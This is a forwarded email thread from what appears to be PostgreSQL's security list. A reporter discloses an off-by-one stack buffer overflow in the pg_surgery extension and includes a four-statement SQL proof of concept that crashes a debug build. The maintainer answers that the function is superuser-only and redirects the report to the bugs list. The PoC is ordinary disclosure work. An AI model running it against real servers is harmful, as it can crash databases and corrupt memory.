Fw: Re: heap_force_common in contrib/pg_surgery/heap_surgery.c has an off by one stack buffer overflow

---Original---



From: "Noah Misch"<noah(at)leadboat(dot)com>


Date: Wed, Jun 3, 2026 23:25 PM


To: "王跃林"<violin0613(at)tju(dot)edu(dot)cn>;


Cc: "security"<security(at)postgresql(dot)org>;


Subject: Re: heap_force_common in contrib/pg_surgery/heap_surgery.c has an off by one stack buffer overflow

On Sat, May 23, 2026 at 11:56:59AM +0800, 王跃林 wrote:

> PoC

> 

>  CREATE EXTENSION IF NOT EXISTS pg_surgery

>  â

>  CREATE TABLE vuln_005_t()

>  â

>  INSERT INTO vuln_005_t SELECT FROM generate_series(1, 291)

>  â

>  SELECT heap_force_freeze('vuln_005_t'::regclass,

>                           ARRAY['(0, 291)']::tid[])

> 

>    The final statement triggers the bug.

> 

> Results

> 

>    The debug build crashed with:

>  TRAP: failed Assert("offno < MaxHeapTuplesPerPage"), File: "heap_surgery.c", Li

> ne: 231

>  server closed the connection unexpectedly

> 

>    In a release build, the assertion is removed and the out of bounds

>    write remains.

Thanks for the report.  The function is superuser-only, so this is not a vuln.

Please report the overflow bug to pgsql-bugs(at)postgresql(dot)org(dot)